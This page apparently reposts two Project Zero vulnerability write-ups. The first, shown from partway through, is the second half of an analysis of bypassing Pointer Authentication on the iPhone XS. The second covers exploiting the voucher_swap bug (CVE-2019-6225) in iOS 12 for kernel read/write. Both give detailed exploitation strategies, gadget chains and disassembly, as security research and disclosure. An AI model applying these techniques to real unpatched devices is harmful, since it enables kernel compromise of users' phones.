LDR         X10, [X9,#0x30]!CBNZ        X19, loc_FFFFFFF007EBD330CBZ         X10, loc_FFFFFFF007EBD330MOV         X19, #0MOV         X11, X9MOVK        X11, #0x14EF,LSL#48AUTIA       X10, X11PACIZA      X10STR         X10, [X9]
Thus, it appeared I was out of luck.The fourth weaknessAfter giving up on signing gadgets and pursuing a few other dead ends, I eventually wondered: What would actually happen if PACIZA was used to sign an invalid pointer validated by AUTIA? I'd assumed that such a pointer would be useless, but I decided to look at the ARM pseudocode to see what would actually happen.
To my surprise, the standard revealed a funny interaction between AUTIA and PACIZA. When AUTIA finds that an authenticated pointer's PAC doesn't match the expected value, it corrupts the pointer by inserting an error code into the pointer's extension bits:
// Auth()// ======// Restores the upper bits of the address to be all zeros or all ones (based on// the value of bit[55]) and computes and checks the pointer authentication// code. If the check passes, then the restored address is returned. If the// check fails, the second-top and third-top bits of the extension bits in the// pointer authentication code field are corrupted to ensure that accessing the// address will give a translation fault.
bits(64) Auth(bits(64) ptr, bits(64) modifier, bits(128) K, boolean data,              bit keynumber)    bits(64) PAC;    bits(64) result;    bits(64) original_ptr;    bits(2) error_code;    bits(64) extfield;
   // Reconstruct the extension field used of adding the PAC to the pointer    boolean tbi = CalculateTBI(ptr, data);    integer bottom_PAC_bit = CalculateBottomPACBit(ptr<55>);    extfield = Replicate(ptr<55>, 64);
   if tbi then        ...    else        original_ptr = extfield<64-bottom_PAC_bit-1:0>:ptr<bottom_PAC_bit-1:0>;
   PAC = ComputePAC(original_ptr, modifier, K<127:64>, K<63:0>);    // Check pointer authentication code    if tbi then        ...    else        if ((PAC<54:bottom_PAC_bit> == ptr<54:bottom_PAC_bit>) &&            (PAC<63:56> == ptr<63:56>)) then            result = original_ptr;        else            error_code = keynumber:NOT(keynumber);            result = original_ptr<63>:error_code:original_ptr<60:0>;    return result;
Meanwhile, when PACIZA is adding a PAC to a pointer, it actually signs the pointer with corrected extension bits, and then corrupts the PAC if the extension bits were originally invalid. From the pseudocode for AddPAC() above:
   ext_ptr = extfield<(64-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>;
PAC = ComputePAC(ext_ptr, modifier, K<127:64>, K<63:0>);
// Check if the ptr has good extension bits and corrupt the pointer// authentication code if not;if !IsZero(ptr<top_bit:bottom_PAC_bit>)        && !IsOnes(ptr<top_bit:bottom_PAC_bit>) then    PAC<top_bit-1> = NOT(PAC<top_bit-1>);
Critically, PAC* instructions will corrupt the PAC of a pointer with invalid extension bits by flipping a single bit of the PAC. While this will certainly invalidate the PAC, this also means that the true PAC can be reconstructed if we can read out the value of a PAC*-forgery on a pointer produced by an AUT* instruction! So sequences like the one above that consist of an AUTIA followed by a PACIZA can be used as signing gadgets even if we don't have a validly signed pointer to begin with: we just have to flip a single bit in the forged PAC.A complete A-key forgery strategy for 16C50With the existence of a single PACIZA signing gadget, we can begin our construction of a complete forgery strategy for the A keys on A12 devices running build 16C50.Stage 1: PACIZA-forgeryA bit of sleuthing reveals that the gadget we found is part of the function sysctl_unregister_oid(), which is responsible for unregistering a sysctl_oid struct from the global sysctl tree. (Once again, this function does not have any PAC-related code in the public sources, but these operations are present on PAC-enabled devices.) Here's a listing of the relevant parts of this function from IDA:
void sysctl_unregister_oid(sysctl_oid *oidp){    sysctl_oid *removed_oidp = NULL;    sysctl_oid *old_oidp = NULL;    BOOL have_old_oidp;    void **handler_field;    void *handler;    uint64_t context;    ...    if ( !(oidp->oid_kind & 0x400000) )         // Don't enter this if    {        ...    }    if ( oidp->oid_version != 1 )               // Don't enter this if    {        ...    }    sysctl_oid *first_sibling = oidp->oid_parent->first;    if ( first_sibling == oidp )                // Enter this if    {        removed_oidp = NULL;        old_oidp = oidp;        oidp->oid_parent->first = old_oidp->oid_link;        have_old_oidp = 1;    }    else    {        ...    }    handler_field = &old_oidp->oid_handler;    handler = old_oidp->oid_handler;    if ( removed_oidp || !handler )             // Take the else    {        ...    }    else    {        removed_oidp = NULL;        context = (0x14EF << 48) | ((uint64_t)handler_field & 0xFFFFFFFFFFFF);        *handler_field = ptrauth_sign_unauthenticated(                ptrauth_auth_function(handler, ptrauth_key_asia, &context),                ptrauth_key_asia,                0);        ...    }    ...}
If we can get this function called with a crafted sysctl_oid that causes the indicated path to be taken, we should be able to forge arbitrary PACIZA pointers.
There aren't any existing global PACIZA'd pointers to this function, so we can't call it directly using our iokit_user_client_trap() primitive, but as luck would have it, there are several global PACIZA'd function pointers that themselves call into it. This is because several kernel extensions register sysctls that they need to unregister before they're unloaded; these kexts often have a module termination function that calls sysctl_unregister_oid(), and the kmod_info struct describing the kext contains a PACIZA'd pointer to the module termination function.
The best candidate I could find was l2tp_domain_module_stop(), which is part of the com.apple.nke.lttp kext. This function will perform some deinitialization work before calling sysctl_unregister_oid() on the global sysctl__net_ppp_l2tp object. Thus, we can PACIZA-sign an arbitrary pointer by overwriting the contents of sysctl__net_ppp_l2tp, calling l2tp_domain_module_stop() via the existing global PACIZA'd pointer, and then reading out sysctl__net_ppp_l2tp's oid_handler field and flipping bit 62.Stage 2: PACIA/PACDA forgeryWhile this lets us PACIZA-forge any pointer we want, it'd be nice to be able to perform PACIA/PACDA forgeries as well, since then we could implement the full bypass described in the section "Finding an entry point for kernel code execution". To do that, I next looked into whether our PACIZA primitive could turn any of the PACIA instructions in the kernelcache into viable signing gadgets.
The most likely candidate for both PACIA and PACDA was an unknown function sub_FFFFFFF007B66C48, which contains the following instruction sequence:
MRS         X9, #4, c15, c0, #4 ; S3_4_C15_C0_4AND         X9, X9, #0xFFFFFFFFFFFFFFFBMSR         #4, c15, c0, #4, X9 ; S3_4_C15_C0_4ISBLDR         X9, [X2,#0x100]CBZ         X9, loc_FFFFFFF007B66D24MOV         W10, #0x7481PACIA       X9, X10STR         X9, [X2,#0x100]...LDR         X9, [X2,#0xF8]CBZ         X9, loc_FFFFFFF007B66D54MOV         W10, #0xCBEDPACDA       X9, X10STR         X9, [X2,#0xF8]...MRS         X9, #4, c15, c0, #4 ; S3_4_C15_C0_4ORR         X9, X9, #4MSR         #4, c15, c0, #4, X9 ; S3_4_C15_C0_4ISB...PACIBSPSTP         X20, X19, [SP,#var_20]!...         ;; Function body (mostly harmless)LDP         X20, X19, [SP+0x20+var_20],#0x20AUTIBSPMOV         W0, #0RET
What makes sub_FFFFFFF007B66C48 a good candidate is that the PACIA/PACDA instructions occur before the stack frame is set up. Ordinarily, calling into the middle of a function will cause problems when the function returns, since the function's epilogue will tear down a frame that was never set up. But since this function's stack frame is set up after our desired entry points, we can use our kernel call primitive to jump directly to these instructions without causing any problems.
Of course, we still have another issue: the PACIA and PACDA instructions use registers X9 and X10, while our kernel call primitive based on iokit_user_client_trap() only gives us control of registers X1 through X6. We'll need to figure out how to get the values we want into the appropriate registers.
In fact, we already found a solution to this very problem earlier: JOP gadgets.
Searching through the kernelcache, just three kexts seem to hold the vast majority of non-PAC'd indirect branches: FairPlayIOKit, LSKDIOKit, and LSKDIOKitMSE. These kexts even stand out in IDA's navigator bar as islands of red in a sea of blue, since IDA cannot create functions out of many of the instructions in these kexts:

It seems that these kexts use some sort of obfuscation to hide control flow and make reverse engineering more difficult. Many jumps in this code are performed indirectly through registers. Unfortunately, in this case the obfuscation actually makes our job as attackers easier, since it gives us a plethora of useful JOP gadgets not protected by PAC.
For our specific use case, we have control of PC and X1 through X6, and we're trying to set X2 to some writable memory region, X9 to the pointer we want to sign, and X10 to the signing context, before jumping to the signing gadget. I eventually settled on executing the following JOP program to accomplish this:
X1 = MOV_X10_X3__BR_X6X2 = KERNEL_BUFFERX3 = CONTEXTX4 = POINTERX5 = MOV_X9_X0__BR_X1X6 = PACIA_X9_X10__STR_X9_X2_100
MOV         X0, X4BR          X5
MOV         X9, X0BR          X1
MOV         X10, X3BR          X6
PACIA       X9, X10STR         X9, [X2,#0x100]...
And with that, we now have a complete bypass strategy that allows us to forge arbitrary PAC signatures using the A keys.TimelineAfter sharing my original kernel read/write exploit on December 18, 2018, I reported the proof-of-concept PAC bypass built on top of voucher_swap on December 30. This POC could produce arbitrary A-key PAC forgeries and call arbitrary kernel functions with 7 arguments, just like on non-PAC devices.
Apple quickly responded suggesting that the latest iOS 12.1.3 beta, build 16D5032a, should mitigate the issue. As this build also fixed the voucher_swap bug, I couldn't test this directly, but I did inspect the kernelcache manually and found that Apple had mitigated the sysctl_unregister_oid() gadget used to produce the first PACIZA forgery.
This build was released on December 19, near the beginning of my research into PAC and long before I reported the bypass to Apple. Thus, like the case with the voucher_swap bug, I suspect that another researcher found and reported this issue first.Apple's fixIn order to fix the sysctl_unregister_oid() gadget (and other AUTIA-PACIA gadgets), Apple has added a few instructions to ensure that if the AUTIA fails, then the resulting invalid pointer will be used instead of the result of PACIZA:
LDR         X10, [X9,#0x30]!            ;; X10 = old_oidp->oid_handlerCBNZ        X19, loc_FFFFFFF007EBD4A0CBZ         X10, loc_FFFFFFF007EBD4A0MOV         X19, #0MOV         X11, X9                     ;; X11 = &old_oidp->oid_handlerMOVK        X11, #0x14EF,LSL#48         ;; X11 = 14EF`&oid_handlerMOV         X12, X10                    ;; X12 = oid_handlerAUTIA       X12, X11                    ;; X12 = AUTIA(handler, 14EF`&handler)XPACI       X10                         ;; X10 = XPAC(handler)CMP         X12, X10PACIZA      X10                         ;; X10 = PACIZA(XPAC(handler))CSEL        X10, X10, X12, EQ           ;; X10 = (PAC_valid ? PACIZA : AUTIA)STR         X10, [X9]
With this change, we can no longer PACIZA-forge a pointer unless we already have a PACIA forgery with a specific context.Brute-force strategiesWhile this does mitigate the fast, straightforward strategy outlined above, with enough time it is still susceptible to brute forcing. Now, I couldn't test this explicitly without an exploit for iOS 12.1.3, but I was able to simulate how long it might take using my exploit on iOS 12.1.2.
The problem is that even though we don't have an existing PACIA-forgery for the pointer we want to PACIZA-forge, we can use our kernel call primitive to execute this gadget repeatedly with different guesses for the valid PAC. Unlike most other instances in which authenticated pointers are used, guessing incorrectly here won't actually trigger a panic: we can just read out the result to see whether we guessed correctly (in which case the oid_handler field will have a PAC added) or incorrectly (in which case oid_handler will look like the result of a failed AUTIA).
Looking back at the list of PAC'd pointers generated in my very first experiment in the subsection "Observing runtime behavior", I compared the extension bits of all the pointers to determine that the PAC was masked into the bits 0xff7fff8000000000. This means the A12 is using a 24-bit PAC, or about 16 million possibilities.
In my experiments, I found that invoking l2tp_domain_module_stop() and l2tp_domain_module_start() 256 times took about 13.2 milliseconds. Thus, exhaustively checking all 16 million possible PACs should take around 15 minutes. And unless there were other changes I didn't notice, once a single PACIZA forgery is produced, the rest of the A-key bypass strategy should still be possible.
(Initializing/deinitializing the module more than about 4096 times started to produce noticeable slowdowns; I didn't identify the source of this slowness, but I do suspect that with effort it should be possible to work around it.)ConclusionIn this post we put Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS under the microscope, describing observed behavior, theorizing about how deviations from the ARM reference might be implemented under the hood, and analyzing the system for weaknesses that would allow a kernel attacker with read/write capabilities to forge PACs for arbitrary pointers. This analysis culminated with a complete bypass strategy and proof-of-concept implementation that allows the attacker to perform arbitrary A-key forgeries on an iPhone XS running iOS 12.1.2. Such a bypass is sufficient for achieving arbitrary kernel code execution through JOP. This strategy was partially mitigated with the release of iOS 12.1.3 beta 16D5032a, although there are indications that it might still be possible to bypass the mitigation via a brute-force approach.
Despite these flaws, PAC remains a solid and worthwhile mitigation. Apple's hardening of PAC in the A12 SoC, which was clearly designed to protect against kernel attackers with read/write, meant that I did not find a systematic break in the design and had to rely on signing gadgets, which are easy to patch via software. As with any complex new mitigation, loopholes are not uncommon in the first few iterations. However, given the fragility of the current bypass technique (relying on, among other things, the single IOUserClient class that allows us to overwrite its IOExternalTrap, one of a very small number of usable PACIZA gadgets, and a handful of non-PAC'd JOP gadgets introduced by obfuscation), I believe it's possible for Apple to harden their implementation to the point that strong forgery bypasses become rare.
Furthermore, PAC shows promise as a tool to make data-only kernel attacks trickier and less powerful. For example, I could see Apple adding something akin to a __security_critical attribute that enables PAC for C pointers that are especially prone to being hijacked during exploits, such as ipc_port's ip_kobject field. Such a mitigation wouldn't end any bug classes, since sophisticated attackers could find other ways of leveraging vulnerabilities into kernel read/write primitives, but it would raise the bar and make simple exploit strategies like those used in voucher_swap much harder (and hopefully less reliable) to pull off.
Kategorie: Hacking & Security

voucher_swap: Exploiting MIG reference counting in iOS 12

29 Leden, 2019 - 19:15
Posted by Brandon Azad, Project Zero
In this post I'll describe how I discovered and exploited CVE-2019-6225, a MIG reference counting vulnerability in XNU's task_swap_mach_voucher() function. We'll see how to exploit this bug on iOS 12.1.2 to build a fake kernel task port, giving us the ability to read and write arbitrary kernel memory. (This bug was independently discovered by @S0rryMybad.) In a later post, we'll look at how to use this bug as a starting point to analyze and bypass Apple's implementation of ARMv8.3 Pointer Authentication (PAC) on A12 devices like the iPhone XS.A curious discoveryMIG is a tool that generates Mach message parsing code, and vulnerabilities resulting from violating MIG semantics are nothing new: for example, Ian Beer's async_wake exploited an issue where IOSurfaceRootUserClient would over-deallocate a Mach port managed by MIG semantics on iOS 11.1.2.
Most prior MIG-related issues have been the result of MIG service routines not obeying semantics around object lifetimes and ownership. Usually, the MIG ownership rules are expressed as follows:
  1. If a MIG service routine returns success, then it took ownership of all resources passed in.
  2. If a MIG service routine returns failure, then it took ownership of none of the resources passed in.

Unfortunately, as we'll see, this description doesn't cover the full complexity of kernel objects managed by MIG, which can lead to unexpected bugs.
The journey started while investigating a reference count overflow in semaphore_destroy(), in which an error path through the function left the semaphore_t object with an additional reference. While looking at the autogenerated MIG function _Xsemaphore_destroy() that wraps semaphore_destroy(), I noticed that this function seems to obey non-conventional semantics.
Here's the relevant code from _Xsemaphore_destroy():
    task = convert_port_to_task(In0P->Head.msgh_request_port);
    OutP->RetCode = semaphore_destroy(task,             convert_port_to_semaphore(In0P->semaphore.name));     task_deallocate(task);#if __MigKernelSpecificCode     if (OutP->RetCode != KERN_SUCCESS) {         MIG_RETURN_ERROR(OutP, OutP->RetCode);     }
    if (IP_VALID((ipc_port_t)In0P->semaphore.name))         ipc_port_release_send((ipc_port_t)In0P->semaphore.name);#endif /* __MigKernelSpecificCode */
The function convert_port_to_semaphore() takes a Mach port and produces a reference on the underlying semaphore object without consuming the reference on the port. If we assume that a correct implementation of the above code doesn't leak or consume extra references, then we can conclude the following intended semantics for semaphore_destroy():
  1. On success, semaphore_destroy() should consume the semaphore reference.
  2. On failure, semaphore_destroy() should still consume the semaphore reference.

Thus, semaphore_destroy() doesn't seem to follow the traditional rules of MIG semantics: a correct implementation always takes ownership of the semaphore object, regardless of whether the service routine returns success or failure.
This of course begs the question: what are the full rules governing MIG semantics? And are there any instances of code violating these other MIG rules?A bad swapNot long into my investigation into extended MIG semantics, I discovered the function task_swap_mach_voucher(). This is the MIG definition from osfmk/mach/task.defs:
routine task_swap_mach_voucher(                 task            : task_t;                 new_voucher     : ipc_voucher_t;         inout   old_voucher     : ipc_voucher_t);
And here's the relevant code from _Xtask_swap_mach_voucher(), the autogenerated MIG wrapper:
mig_internal novalue _Xtask_swap_mach_voucher        (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP){...    kern_return_t RetCode;    task_t task;    ipc_voucher_t new_voucher;    ipc_voucher_t old_voucher;...    task = convert_port_to_task(In0P->Head.msgh_request_port);
   new_voucher = convert_port_to_voucher(In0P->new_voucher.name);
   old_voucher = convert_port_to_voucher(In0P->old_voucher.name);
   RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
   ipc_voucher_release(new_voucher);
   task_deallocate(task);
   if (RetCode != KERN_SUCCESS) {        MIG_RETURN_ERROR(OutP, RetCode);    }...    if (IP_VALID((ipc_port_t)In0P->old_voucher.name))        ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);
   if (IP_VALID((ipc_port_t)In0P->new_voucher.name))        ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);...    OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);
   OutP->Head.msgh_bits |= MACH_MSGH_BITS_COMPLEX;    OutP->Head.msgh_size = (mach_msg_size_t)(sizeof(Reply));    OutP->msgh_body.msgh_descriptor_count = 1;}
Once again, assuming that a correct implementation doesn't leak or consume extra references, we can infer the following intended semantics for task_swap_mach_voucher():
  1. task_swap_mach_voucher() does not hold a reference on new_voucher; the new_voucher reference is borrowed and should not be consumed.
  2. task_swap_mach_voucher() holds a reference on the input value of old_voucher that it should consume.
  3. On failure, the output value of old_voucher should not hold any references on the pointed-to voucher object.
  4. On success, the output value of old_voucher holds a voucher reference donated from task_swap_mach_voucher() to _Xtask_swap_mach_voucher() that the latter consumes via convert_voucher_to_port().

With these semantics in mind, we can compare against the actual implementation. Here's the code from XNU 4903.221.2's osfmk/kern/task.c, presumably a placeholder implementation:
kern_return_ttask_swap_mach_voucher(        task_t          task,        ipc_voucher_t   new_voucher,        ipc_voucher_t   *in_out_old_voucher){    if (TASK_NULL == task)        return KERN_INVALID_TASK;
   *in_out_old_voucher = new_voucher;    return KERN_SUCCESS;}
This implementation does not respect the intended semantics:
  1. The input value of in_out_old_voucher is a voucher reference owned by task_swap_mach_voucher(). By unconditionally overwriting it without first calling ipc_voucher_release(), task_swap_mach_voucher() leaks a voucher reference.
  2. The value new_voucher is not owned by task_swap_mach_voucher(), and yet it is being returned in the output value of in_out_old_voucher. This consumes a voucher reference that task_swap_mach_voucher() does not own.

Thus, task_swap_mach_voucher() actually contains two reference counting issues! We can leak a reference on a voucher by calling task_swap_mach_voucher() with the voucher as the third argument, and we can drop a reference on the voucher by passing the voucher as the second argument. This is a great exploitation primitive, since it offers us nearly complete control over the voucher object's reference count.
(Further investigation revealed that thread_swap_mach_voucher() contained a similar vulnerability, but only the reference leak part, and changes in iOS 12 made the vulnerability unexploitable.)On vouchersIn order to grasp the impact of this vulnerability, it's helpful to understand a bit more about Mach vouchers, although the full details aren't important for exploitation.
Mach vouchers are represented by the type ipc_voucher_t in the kernel, with the following structure definition:
/* * IPC Voucher * * Vouchers are a reference counted immutable (once-created) set of * indexes to particular resource manager attribute values * (which themselves are reference counted). */struct ipc_voucher {    iv_index_t      iv_hash;        /* checksum hash */    iv_index_t      iv_sum;         /* checksum of values */    os_refcnt_t     iv_refs;        /* reference count */    iv_index_t      iv_table_size;  /* size of the voucher table */    iv_index_t      iv_inline_table[IV_ENTRIES_INLINE];    iv_entry_t      iv_table;       /* table of voucher attr entries */    ipc_port_t      iv_port;        /* port representing the voucher */    queue_chain_t   iv_hash_link;   /* link on hash chain */};
As the comment indicates, an IPC voucher represents a set of arbitrary attributes that can be passed between processes via a send right in a Mach message. The primary client of Mach vouchers appears to be Apple's libdispatch library.
The only fields of ipc_voucher relevant to us are iv_refs and iv_port. The other fields are related to managing the global list of voucher objects and storing the attributes represented by a voucher, neither of which will be used in the exploit.
As of iOS 12, iv_refs is of type os_refcnt_t, which is a 32-bit reference count with allowed values in the range 1-0x0fffffff (that's 7 f's, not 8). Trying to retain or release a voucher with a reference count outside this range will trigger a panic.
iv_port is a pointer to the ipc_port object that represents this voucher to userspace. It gets initialized whenever convert_voucher_to_port() is called on an ipc_voucher with iv_port set to NULL.
In order to create a Mach voucher, you can call the host_create_mach_voucher() trap. This function takes a "recipe" describing the voucher's attributes and returns a voucher port representing the voucher. However, because vouchers are immutable, there is one quirk: if the resulting voucher's attributes are exactly the same as a voucher that already exists, then host_create_mach_voucher() will simply return a reference to the existing voucher rather than creating a new one.That's out of line!There are many different ways to exploit this bug, but in this post I'll discuss my favorite: incrementing an out-of-line Mach port pointer so that it points into pipe buffers.
Now that we understand what the vulnerability is, it's time to determine what we can do with it. As you'd expect, an ipc_voucher gets deallocated once its reference count drops to 0. Thus, we can use our vulnerability to cause the voucher to be unexpectedly freed.
But freeing the voucher is only useful if the freed voucher is subsequently reused in an interesting way. There are three components to this: storing a pointer to the freed voucher, reallocating the freed voucher with something useful, and reusing the stored voucher pointer to modify kernel state. If we can't get any one of these steps to work, then the whole bug is pretty much useless.
Let's consider the first step, storing a pointer to the voucher. There are a few places in the kernel that directly or indirectly store voucher pointers, including struct ipc_kmsg's ikm_voucher field and struct thread's ith_voucher field. Of these, the easiest to use is ith_voucher, since we can directly read and write this field's value from userspace by calling thread_get_mach_voucher() and thread_set_mach_voucher(). Thus, we can make ith_voucher point to a freed voucher by first calling thread_set_mach_voucher() to store a reference to the voucher, then using our voucher bug to remove the added reference, and finally deallocating the voucher port in userspace to free the voucher.
Next consider how to reallocate the voucher with something useful. ipc_voucher objects live in their own zalloc zone, ipc.vouchers, so we could easily get our freed voucher reallocated with another voucher object. Reallocating with any other type of object, however, would require us to force the kernel to perform zone garbage collection and move a page containing only freed vouchers over to another zone. Unfortunately, vouchers don't seem to store any significant privilege-relevant attributes, so reallocating our freed voucher with another voucher probably isn't helpful. That means we'll have to perform zone gc and reallocate the voucher with another type of object.
In order to figure out what type of object we should reallocate with, it's helpful to first examine how we will use the dangling voucher pointer in the thread's ith_voucher field. We have a few options, but the easiest is to call thread_get_mach_voucher() to create or return a voucher port for the freed voucher. This will invoke ipc_voucher_reference() and convert_voucher_to_port() on the freed ipc_voucher object, so we'll need to ensure that both iv_refs and iv_port are valid.
But what makes thread_get_mach_voucher() so useful for exploitation is that it returns the voucher's Mach port back to userspace. There are two ways we could leverage this. If the freed ipc_voucher object's iv_port field is non-NULL, then that pointer gets directly interpreted as an ipc_port pointer and thread_get_mach_voucher() returns it to us as a Mach send right. On the other hand, if iv_port is NULL, then convert_voucher_to_port() will return a freshly allocated voucher port that allows us to continue manipulating the freed voucher's reference count from userspace.
This brought me to the idea of reallocating the voucher using out-of-line ports. One way to send a large number of Mach port rights in a message is to list the ports in an out-of-line ports descriptor. When the kernel copies in an out-of-line ports descriptor, it allocates an array to store the list of ipc_port pointers. By sending many Mach messages containing out-of-line ports descriptors, we can reliably reallocate the freed ipc_voucher with an array of out-of-line Mach port pointers.
Since we can control which elements in the array are valid ports and which are MACH_PORT_NULL, we can ensure that we overwrite the voucher's iv_port field with NULL. That way, when we call thread_get_mach_voucher() in userspace, convert_voucher_to_port() will allocate a fresh voucher port that points to the overlapping voucher. Then we can use the reference counting bug again on the returned voucher port to modify the freed voucher's iv_refs field, which will change the value of the out-of-line port pointer that overlaps iv_refs by any amount we want.
Of course, we haven't yet addressed the question of ensuring that the iv_refs field is valid to begin with. As previously mentioned, iv_refs must be in the range 1-0x0fffffff if we want to reuse the freed ipc_voucher without triggering a kernel panic.
The ipc_voucher structure is 0x50 bytes and the iv_refs field is at offset 0x8; since the iPhone is little-endian, this means that if we reallocate the freed voucher with an array of out-of-line ports, iv_refs will always overlap with the lower 32 bits of an ipc_port pointer. Let's call the Mach port that overlaps iv_refs the base port. Using either MACH_PORT_NULL or MACH_PORT_DEAD as the base port would result in iv_refs being either 0 or 0xffffffff, both of which are invalid. Thus, the only remaining option is to use a real Mach port as the base port, so that iv_refs is overwritten with the lower 32 bits of a real ipc_port pointer.
This is dangerous because if the lower 32 bits of the base port's address are 0 or greater than 0x0fffffff, accessing the freed voucher will panic. Fortunately, kernel heap allocation on recent iOS devices is pretty well behaved: zalloc pages will be allocated from the range 0xffffffe0xxxxxxxx starting from low addresses, so as long as the heap hasn't become too unruly since the system booted (e.g. because of a heap groom or lots of activity), we can be reasonably sure that the lower 32 bits of the base port's address will lie within the required range. Hence overlapping iv_refs with an out-of-line Mach port pointer will almost certainly work fine if the exploit is run after a fresh boot.
This gives us our working strategy to exploit this bug:
  1. Allocate a page of Mach vouchers.
  2. Store a pointer to the target voucher in the thread's ith_voucher field and drop the added reference using the vulnerability.
  3. Deallocate the voucher ports, freeing all the vouchers.
  4. Force zone gc and reallocate the page of freed vouchers with an array of out-of-line ports. Overlap the target voucher's iv_refs field with the lower 32 bits of a pointer to the base port and overlap the voucher's iv_port field with NULL.
  5. Call thread_get_mach_voucher() to retrieve a voucher port for the voucher overlapping the out-of-line ports.
  6. Use the vulnerability again to modify the overlapping voucher's iv_refs field, which changes the out-of-line base port pointer so that it points somewhere else instead.
  7. Once we receive the Mach message containing the out-of-line ports, we get a send right to arbitrary memory interpreted as an ipc_port.

Pipe dreamsSo what should we get a send right to? Ideally we'd be able to fully control the contents of the fake ipc_port we receive without having to play risky games by deallocating and then reallocating the memory backing the fake port.
Ian actually came up with a great technique for this in his multi_path and empty_list exploits using pipe buffers. Our exploit so far allows us to modify an out-of-line pointer to the base port so that it points somewhere else. So, if the original base port lies directly in front of a bunch of pipe buffers in kernel memory, then we can leak voucher references to increment the base port pointer in the out-of-line ports array so that it points into the pipe buffers instead.
At this point, we can receive the message containing the out-of-line ports back in userspace. This message will contain a send right to an ipc_port that overlaps one of our pipe buffers, so we can directly read and write the contents of the fake ipc_port's memory by reading and writing the overlapping pipe's file descriptors.tfp0Once we have a send right to a completely controllable ipc_port object, exploitation is basically deterministic.
We can build a basic kernel memory read primitive using the same old pid_for_task() trick: convert our port into a fake task port such that the fake task's bsd_info field (which is a pointer to a proc struct) points to the memory we want to read, and then call pid_for_task() to read the 4 bytes overlapping bsd_info->p_pid. Unfortunately, there's a small catch: we don't know the address of our pipe buffer in kernel memory, so we don't know where to make our fake task port's ip_kobject field point.
We can get around this by instead placing our fake task struct in a Mach message that we send to the fake port, after which we can read the pipe buffer overlapping the port and get the address of the message containing our fake task from the port's ip_messages.imq_messages field. Once we know the address of the ipc_kmsg containing our fake task, we can overwrite the contents of the fake port to turn it into a task port pointing to the fake task, and then call pid_for_task() on the fake task port as usual to read 4 bytes of arbitrary kernel memory.
An unfortunate consequence of this approach is that it leaks one ipc_kmsg struct for each 4-byte read. Thus, we'll want to build a better read primitive as quickly as possible and then free all the leaked messages.
In order to get the address of the pipe buffer we can leverage the fact that it resides at a known offset from the address of the base port. We can call mach_port_request_notification() on the fake port to add a request that the base port be notified once the fake port becomes a dead name. This causes the fake port's ip_requests field to point to a freshly allocated array containing a pointer to the base port, which means we can use our memory read primitive to read out the address of the base port and compute the address of the pipe buffer.
At this point we can build a fake kernel task inside the pipe buffer, giving us full kernel read/write. Next we allocate kernel memory with mach_vm_allocate(), write a new fake kernel task inside that memory, and then modify the fake port pointer in our process's ipc_entry table to point to the new kernel task instead. Finally, once we have our new kernel task port, we can clean up all the leaked memory.
And that's the complete exploit! You can find exploit code for the iPhone XS, iPhone XR, and iPhone 8 here: voucher_swap. A more in-depth, step-by-step technical analysis of the exploit technique is available in the source code.Bug collisionI reported this vulnerability to Apple on December 6, 2018, and by December 19th Apple had already released iOS 12.1.3 beta build 16D5032a which fixed the issue. Since this would be an incredibly quick turnaround for Apple, I suspected that this bug was found and reported by some other party first.
I subsequently learned that this bug was independently discovered and exploited by Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team. Amusingly, we were both led to this bug through semaphore_destroy(); thus, I wouldn't be surprised to learn that this bug was broadly known before being fixed. SorryMybad used this vulnerability as part of a remote jailbreak for the Tianfu Cup; you can read about his strategy for obtaining tfp0.ConclusionThis post looked at the discovery and exploitation of P0 issue 1731, an IPC voucher reference counting issue rooted in failing to follow MIG semantics for inout objects. When run a few seconds after a fresh boot, the exploit strategy discussed here is quite reliable: on the devices I've tested, the exploit succeeds upwards of 99% of the time. The exploit is also straightforward enough that, when successful, it allows us to clean up all leaked resources and leave the system in a completely stable state.
In a way, it's surprising that such "easy" vulnerabilities still exist: after all, XNU is open source and heavily scrutinized for valuable bugs like this. However, MIG semantics are very unintuitive and don't align well with the natural patterns for writing secure kernel code. While I'd love to believe that this is the last major MIG bug, I wouldn't be surprised to see at least a few more crop up.
This bug is also a good reminder that placeholder code can also introduce security vulnerabilities and should be scrutinized as tightly as functional code, no matter how simple it may seem.
And finally, it's worth noting that the biggest headache for me while exploiting this bug, the limited range of allowed reference count values, wasn't even an issue on iOS versions prior to 12. On earlier platforms, this bug would have always been incredibly reliable, not just directly after a clean boot. Thus, it's good to see that even though os_refcnt_t didn't stop this bug from being exploited, the mitigation at least impacts exploit reliability, and probably decreases the value of bugs like this to attackers.
My next post will show how to use this exploit to analyze Apple's implementation of Pointer Authentication, culminating in a technique that allows us to forge PACs for pointers signed with the A keys. This is sufficient to call arbitrary kernel functions or execute arbitrary code in the kernel via JOP.
Kategorie: Hacking & Security